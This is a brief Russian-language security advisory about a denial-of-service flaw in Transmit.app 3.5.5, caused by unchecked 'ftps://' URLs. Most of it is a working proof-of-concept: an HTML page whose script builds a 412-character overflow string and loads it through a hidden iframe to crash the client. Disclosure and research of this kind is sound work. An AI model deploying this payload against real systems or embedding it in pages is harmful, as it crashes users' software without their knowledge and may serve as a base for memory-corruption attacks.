Программа: Transmit.app 3.5.5
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных при обработке URL вида «ftps://». Атакующий может передать злонамеренную строку через URL «ftps://», что приведет систему к отказу в обслуживании.
Пример:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>MOAB-19-01-2007</title>
<script>
function boom() {
var recipient = document.getElementById('testbox');
var str = '';
for (var i = 0; i < 408; i++) {
str = str + 'A'
}
str = str + 'ABCD';
alert('Payload size: ' + str.length);
str = "ftps://" + str;
ftarget = document.createElement('iframe');
ftarget.src = str;
ftarget.width = 1;
ftarget.height = 1;
recipient.appendChild(ftarget);
}
</script>
</head>
<body>
<div id="testbox" style="display: none;"></div>
<input type="button" onclick="boom();" value="Test MOAB-19-01-2007" />
</body>
</html>
